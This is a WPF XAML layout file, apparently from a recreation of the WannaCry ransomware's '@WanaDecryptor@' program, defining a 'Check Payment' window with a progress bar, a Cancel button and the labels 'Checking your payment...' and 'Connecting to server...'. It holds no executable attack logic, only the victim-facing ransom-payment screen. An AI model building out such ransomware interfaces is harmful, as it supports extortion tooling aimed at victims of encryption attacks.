@WanaDecryptor@/CheckPayment.xaml

<Window x:Class="_WanaDecryptor_.CheckPayment"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:_WanaDecryptor_"
        mc:Ignorable="d"
        
        Title="Check Payment" 
        
        Height="146.975" 
        Width="467.549"
        
        Background="#FFDEDEDE"
        
        WindowStyle="None" 
        ResizeMode="NoResize"
        WindowStartupLocation="CenterScreen"
        
        Loaded="Window_Loaded">
    
    <Grid>
        <ProgressBar
            x:Name="progressBar"
            HorizontalAlignment="Left"
            Height="24"
            Maximum="1000"
            Margin="19,79,0,0"
            VerticalAlignment="Top"
            Width="430"/>
        
        
        <Button 
            Content="Cancel"
            FontFamily="/@WanaDecryptor@;component/Resources/#Arial CE"
            HorizontalAlignment="Left"
            Margin="374,114,0,0"
            VerticalAlignment="Top"
            Width="75"
            Height="23"
            Click="CancelButton_Click"/>
        
        
        <Label
            Content="Connecting to server..."
            FontFamily="/@WanaDecryptor@;component/Resources/#Arial CE"
            HorizontalAlignment="Left"
            Margin="19,32,0,0"
            VerticalAlignment="Top"/>
        
        
        <Label
            Content="Checking your payment..."
            FontFamily="/@WanaDecryptor@;component/Resources/#Arial CE"
            HorizontalAlignment="Left"
            Margin="19,6,0,0"
            VerticalAlignment="Top"/>
    </Grid>
</Window>
